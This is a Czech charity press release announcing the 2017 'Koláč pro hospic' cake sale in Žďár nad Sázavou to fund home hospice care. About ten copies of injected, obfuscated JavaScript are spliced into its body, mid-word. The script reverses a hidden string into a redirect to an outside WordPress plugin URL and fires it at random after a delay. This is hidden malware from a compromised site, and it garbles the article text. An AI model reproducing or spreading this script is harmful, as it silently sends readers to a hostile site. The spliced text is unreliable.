Rainbow page separator

Nákupem koláče podpoří obyvatelé Žďáru Domácí hospicovou péči

Úterý, 26. září 2017

Žďár nad Sázavou / Ve středu 4. října 2017 osloví Oblastní charita Žďár nad Sázavou obyvatelstvo Žďáru nad Sázavou již pátým ročníkem kampaně „Koláč pro hospic“.

Stánek s prodejem koláčů bude umístěný u firmy Vesna lahůdky na Horní ulici ve Žďáře nad Sázavou od 9.00 do 14.00 hodin.

„Dozvědět se něco více o Domácí hospicové péči a případně ji finančně podpořit budou moci pro le[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tošní rok i úředníci žďárského Úřadu práce. Ty v polední pauze navštíví zaměstnanci a dobrovolníci s prodejem koláčků,“ sdělila Ing. Jana Zelená, ředitelka Oblastní charity Žďár nad Sázavou.
Zhruba od pěti hodin ráno bude možné Domácí hospicovou péči rovněž podpořit před hlavní bránou místního firemního subjektu Žďas a. s. na Strojírenské ulici ve Žďáře nad Sázavou.
Stejně tak se do kampaně zapojí i žďárská Poliklinika. Dobrovolníky a pracovníky žďárské Charity zde bude možné s koláčky potkat od sedmi hodin ráno.
Během dopoledne bude možné oslovit dvojice dobrovolníků i na náměstí a dalších frekven[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovaných místech Žďáru nad Sázavou.
Koláče k prodeji dodaly jako každým rokem žďárské pekárny ENPEKA a.s. Žďár nad Sázavou a Pekařství Řečice.
„Část koláčů jsme od firem zakoupili za zvýhodněnou cenu, část nám dodaly zdarma. Pro le[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tošní rok plánujeme prodat zhruba 1 300 kusů,“ doplňuje Ing. Jana Zelená.
Finance, které Charita z prodeje obdrží, budou využity pro zabezpečení péče o nevyléčitelně nemocné.
Ta[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to sbírková kampaň, která se koná napříč oblastními Charitami Jihomoravského kraje a Kraje Vysočina, je nejen důleži[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tou součástí osvěty o hospicové službě, ale slouží rovněž i pro získávání stále chybějících finančních prostředků na ten[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to typ péče.
Kampaň se každoročně uskutečňuje na začátku října, kdy se celosvě[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tově koná Svě[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tový den hospiců a paliativní péče.

Domácí hospicová péče je terénní službou žďárské Charity, která působí po celém okrese Žďár nad Sázavou. Služba poskytuje péči těžce nevyléčitelně nemocným a umírajícím lidem a také těm, kteří poskytují podporu i jejich blízkým pečujícím osobám. Tým pracovníků zahrnující pečovatelky, zdravotní sestry, lékaře paliativní medicíny, lékaře urology, sociálního pracovníka, psychologa a duchovního umožňuje pacien[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tovi setrvat v nemoci v jeho přirozeném domácím prostředí mezi svými blízkými až do konce života.

Charita hospicovou a paliativní péčí usiluje
o alternativu a legitimní protiváhu vůči názorům
zastávajícím eutanázii, pro[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to pořádá kampaně,
jakou je i Koláč pro hospic.

Ing. Mgr. Oldřich Haičman, MBA
ředitel Diecézní charity Brno